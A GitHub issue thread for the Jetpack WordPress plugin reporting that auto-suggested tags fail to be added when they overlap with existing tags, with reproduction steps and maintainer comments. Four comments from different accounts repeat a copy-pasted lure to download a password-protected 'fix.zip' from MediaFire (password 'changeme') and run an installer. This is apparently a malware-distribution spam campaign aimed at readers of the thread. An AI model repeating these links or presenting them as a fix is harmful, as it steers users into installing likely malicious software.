### ISSUE TITLE
Suggested Tags Not Added After Clicking Add Tags Button

### ISSUE THREAD

**Issue by dzver** [Automattic/jetpack#39110]
### Impacted plugin

Jetpack

### Quick summary

The automatic tag suggestions lead to a "No Tags Added" result. The reason for the problem is that the suggested tags may partially overlap with the ones I already added.

The issue was first reported as a Calypso bug but the person triaging it requested that we move it here:
https://github.com/Automattic/wp-calypso/issues/93268

### Steps to reproduce

On a WordPress.com Simple Site:

1. Write a post
2. Add some relevant tags using the editor
3. Publish the post
4. Select to also add the auto-suggested tags
5. No tags added

### A clear and concise description of what you expected to happen.

Tags to be added

### What actually happened

Tags weren't added

### Impact

Most (> 50%)

### Available workarounds?

No but the platform is still usable

### Platform (Simple and/or Atomic)

Simple

### Logs or notes

https://github.com/user-attachments/assets/a7b54c23-e1ef-43ac-911f-78660100a242

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jeherve** [comment]
@Automattic/lego Is that something that would now fall under your radar?

**Comment by taipeicoder** [comment]
@arthur791004 would you be able to taking a look at this? Thanks.

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
